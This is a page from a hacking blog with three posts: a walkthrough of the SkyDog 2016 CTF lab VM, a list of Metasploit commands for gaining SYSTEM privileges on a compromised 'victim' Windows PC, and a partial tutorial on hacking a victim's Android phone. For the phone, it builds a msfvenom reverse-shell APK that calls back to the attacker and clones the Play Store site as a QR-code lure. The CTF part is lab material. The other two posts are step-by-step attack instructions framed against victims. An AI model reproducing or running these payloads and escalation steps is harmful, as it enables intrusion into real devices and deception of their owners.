Hacking Articles|Raj Chandel's Blog

Hack the SkyDog Con CTF 2016 - Catch Me If You Can VM

at 9:02 AM Thursday, November 24, 2016 0 comments

SkyDog is the second VM in CTF series created by James Brower. It is configured with DHCP so the IP will be given to it automatically. This VM is based on Catch me if you can which is movie about Frank who is conman. So it is correct to assume that a broad OSINT concept will be used in it. This is an amazing VM as it uses about hacking and forensic skills. The author of this VM has given us hints about all the eight flags as below:

Flag #1 : Don’t go Home Frank! There’s a Hex on Your House.

Flag #2 : Obscurity or Security?

Flag #3 : Be Careful Agent, Frank Has Been Known to Intercept Traffic Our Traffic.

Flag #4 : A Good Agent is Hard to Find.

Flag #5 : The Devil is in the Details – Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices

Flag #6 : Where in the World is Frank?

Flag #7 : Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive!

Flag #8 : Franks Lost His Mind or Maybe it’s His Memory. He’s Locked Himself inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!

Except this we know that the flags are in MD5 Hash. You can download it from: https://www.vulnhub.com/entry/skydog-2016-catch-me-if-you-can,166/.

Penetrating Methodology

§ Network Scanning (Netdiscover, Nmap)

§ Examine source code of the web page

§ Extracting and decoding of hex value for 1^st flag

§ Login into SSH for 2^nd flag

§ Abusing HTTPS for 3^rd flag

§ Intercept the Browser request and Change user-agent (Burp-suite)

§ Obtain the 4^th flag and follow the clue

§ Explore FBI workstation and abuse its source code FBI.txt file

§ Decrypt the 5^th flag to obtain credential

§ Download the image after login

§ Extract hidden code from inside the image (steghide)

§ Open the flag.txt file and capture the 6^th flag along with password.

§ Login into SSH and capture the 7^th flag

§ Download zip file via SCP and unzip

§ Forensic Trick-Extract file info to capture 8^th flag (volatility)

WalkThrough

Let us find our target first by using the following command in the terminal of kali :

netdiscover

We can clearly see that our target IP is 192.168.1.100. Now as we have identified our target let’s scanning the IP with nmap.

nmap -p- -sV 192.168.1.100

With the assistance of nmap you can see that the port number 22, 80, 443, and 22222 are working with the service of SSH (closed), HTTP, HTTPS and SSH (open). Here, you can observe that using port forwarding the service of SSH has been forwarded to the port number 22222 from its default port that is 22. Also, the service is closed on 22 and open on 22222. This is a minor security feature to throw off attackers.

As port 80 is open, along with 443; we can open this IP in a browser.

The home page has nothing to go on for us therefore we checked its page source.

In the page source you will find a directory. Let’s open it and see what it has got for us.

The directory too didn’t had much to go on, so we viewed the page source again and there we found a hex value. Now from the first hint given by the author, which is Flag #1: Don’t go Home Frank! There’s a Hex on Your House, we can tell that this hex is our first flag. Lets convert the hex by using the following command in the terminal of kali :

echo | xxd -p -r

Here,

xxd à is used to create a hex dump

-p à is used so the output can be in the plain text

-r à is used convert the hex

Using the above command the hex is converted as you can see in the image above. And so when we convert this flag from MD5 hash. Hence, the flag is nmap that means our next hint is nmap and that is where we should look.

As explained earlier, the port SSH has been given a security feature in the nmap so we should poke it by typing the following command:

ssh 192.168.1.100 -p22222

And so we have our next flag; upon de-hashing it turns out to be encrypt.

We will find our next flag somewhere in the encryption on the webpage. The most basic encryption given to the webpage is a security certificate. Let’s check that out.

Click on the highlight area as shown in the above picture. The following dialogue box will open.

Click on the security tab as shown in the above image. And then click on View Certificate button. In the certificate you will find the third flag as shown below:

When converted; our next flag turns out to be personnel.

I had assumed “personne1” as a directory, so let’s open it in a browser.

As shown, the directory says that “you do not appear to be from an FBI workstation” that means there is somewhere FBI workstation. I looked back through every page source we had and found that we need internet explorer 4 for the FBI workstation.

Now, reload the personal directory and capture its cooking using bursuite; which will help you change the browser.

In the burpsuite, once you have capture the cookies change user-agaent “linux x86_64” to “MSIE 4.0” as shown in the images.

And once you forward the request from burp-suite and the personal directory page will load. There you will find you’re next flag and a hint with that flag i.e. we have to add a prefix ‘new’ to whatever the flag we have after decrypting hash value.

Upon converting our flag is evidence. So adding the prefix new our flag becomes newevidence.

Now the directory /newevidence takes us to a FBI login portal.

Now we don’t have any username and password and no clue about it too. So I explored its page source.

In the page source there we found two important things i.e. evidence.txt When opened, evidence.txt gave us our next flag.

Once converted the flag is panam.

Now let’s open newevidence which we found in previous flag.

Its shows us an image. There must be stegno-graphed message in the image. Therefore, use the following command to see it :

steghide extract -sf newevidence.jpeg

The hidden file was flag.txt to read the flag, type :

cat flag.txt

By dehashing the flag we get ILoveFrance. And we also have a clue i.e. iheartbrenda. This flag and clue are both important, make its note.

For our seventh flag we have the hint — Flag #7 : Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive! In this hint it says “I am the fastest man alive” this is the introductory dialogue of The Flash. And even in the movie Frank uses a fake name Barry Allen, original name of the flash.

Therefore, barry allen can be our username. Let’s log in through SSH port using bary allen username. When it asked for password I tried both ILoveFrance and iheartbrenda and fortunately iheartbrenda was the correct password.

Once we were logged in, we used following commands to find our flag :

ls à to see all the list of all the files

cat flag.txt à to read the flag

And so, we have our next flag. Once de-hashed the flag was theflash

As we have both password and username for the login of SSH; here we can use scp service commands. You can use SCP (the scp command) to securely copy files and directories between remote hosts without starting an FTP session or logging into the remote systems explicitly.

scp -P 22222 barryallen@192.168.1.100:/home/barryallen/security-system.data /root/Desktop/file

Once you have the file, unzip it and for that type:

unzip file

Now by using the following command we complete our CTF challenge.

volatility –f security-system.data notepad

YAY! Once again, we have completed a CTF challenge successfully.

7 Ways to Get Admin Access of Remote Windows PC (Bypass Privilege Escalation)

at 7:19 AM Wednesday, November 23, 2016 0 comments

When you exploit the victim pc there would be certain limits which resist performing some action even after you are having the shell of victim’s pc. To get complete access of your victim pc; you need to bypass privilege escalation where a user receives privileges they are not authorize to. These privileges can be used to delete files, view private information, or install unwanted programs such as viruses. Metasploit has various other post exploits that will use a number of different techniques to attempt to gain system level privileges on the remote system.

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open kali Linux terminal type msfconsole

Use payload for windows and start multi/handler for reverse connection. Once you hacked the victim pc now go for privilege escalation using following techniques

Windows Escalate UAC Protection Bypass

Available targets: Windows x32 and Windows x64 bit

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off.

msf > use exploit/windows/local/bypassuac

msf exploit(bypassuac) > set session 1

msf exploit(bypassuac) > exploit

Give a look at image when you will use getuid command it ask for user ID that is username: pc10; after using getsystem now username is system. Again use getuid command now you are having admin access.

Windows Escalate UAC Protection Bypass (In Memory Injection)

Available targets: Windows x32 and Windows x64 bit

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of three separate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). If specifying EXE::Custom your DLL should call Exit Process () after starting your payload in a separate process.

msf > use exploit/windows/local/bypassuac_injection

msf exploit(bypassuac_injection) > set session 1

msf exploit(bypassuac_injection) > exploit

Use getsystem command and then go for user ID by typing getuid command in meterpreter.

Windows Escalate UAC Protection Bypass (Script Host Vulnerability)

Available targets: Windows x32 and Windows x64 bit

This module will bypass Windows UAC by utilizing the missing .manifest on the script host cscript/wscript.exe binaries.

msf > use windows/local/bypassuac_vbs

msf exploit(bypassuac_vbs) > set session 1

msf exploit(bypassuac_vbs) > exploit

use getsystem command and then go for user ID by typing getuid command in meterpreter.

Windows Escalate UAC Execute RunAs

Available targets: Windows x32 and Windows x64 bit

This module will attempt to elevate execution level using the Shell Execute undocumented Run As flag to bypass low UAC settings. Ask always uses a self-generated payload which is easily detected by AV. Click yes to allow the payload to create another reverse shell with elevated privileges.

msf > use windows/local/ask

msf exploit(ask) > set session 1

msf exploit(ask) > exploit

Use getsystem command and then go for user ID by typing getuid command in meterpreter.

MS16-032 Secondary Logon Handle Privilege Escalation

Available targets: Windows x32 and Windows x64 bit

This module exploits the lack of sanitization of standard handles in Windows' Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores.

msf > use windows/local/ms16_032_secondary_logon_handle_privesc

msf exploit(ms16_032_secondary_logon_handle_privesc) > set session 1

msf exploit(ms16_032_secondary_logon_handle_privesc) > exploit

Use getsystem command and then go for user ID by typing getuid command in meterpreter.

MS16-016 mrxdav.sys WebDav Local Privilege Escalation

Available targets: Windows x32 bit

This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn a process on the target system and elevate its privileges to NT AUTHORITY\SYSTEM before executing the specified payload within the context of the elevated process.

msf exploit(ms16_016_webdav) >set session 1

msf exploit(ms16_016_webdav) > exploit

Use getsystem command in meterpreter for admin access of pc.

Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)

Available targets: Windows 732 bit

This module leverages a kernel pool overflow in Win32k which allows local privilege escalation. The kernel shell code nulls the ACL for the winlogon.exe process (a SYSTEM process). This allows any unprivileged process to freely migrate to winlogon.exe, achieving privilege escalation. This exploit was used in pwn2own 2013 by MWR to break out of chrome's sandbox. NOTE: when a meterpreter session started by this exploit exits, winlogin.exe is likely to crash.

msf exploit(ms13_053_schlamperei) >set session 1

msf exploit(ms13_053_schlamperei) >exploit

Use getsystem command and then go for user ID by typing getuid command in meterpreter.

Hack Android Phone using HTA Attack with QR Code

at 9:31 AM Monday, November 21, 2016 0 comments

QR Code is a 2 dimensional barcode which can be scanned using Smartphone’s or dedicated QR Readers. These QR Codes are directly linked to contact numbers, websites, usernames, photos, SMS, E-mails and even encryptions but they do not end here. QR Codes are big deal in Japan and it’s just a matter of time when take over whole world as there is growth in SEO.

Till now every one of you must have understood that QR Codes is the ‘next big thing’, let’s make it a big thing but in regards to hacking. Yes! In this article we are going to hack our victim’s mobile in some easy steps using QR Code. And all you need for this is your beloved Kali Linux.

Our step is to create a pernicious file using msfvenom.

Msfvenom –p android/meterpreter/reverse_tcp lhost=192.168.1.100 lport=6666 > /root/Desktop/Launcher.apk

Now open SET. Through SET we will alter HTA attack into an APK attack to gain access of the victim’s Smartphone. Thus, from the SET menu select 2^nd option which indicates Website Attack Vectors?

Then further select 8^th option which refers to HTA Attack Method.

And then select Site Cloner by typing 2.

When you type the said 2 option, it will ask you enter the URL that you want to clone. Here give the URL of play store: https://play.google.com/store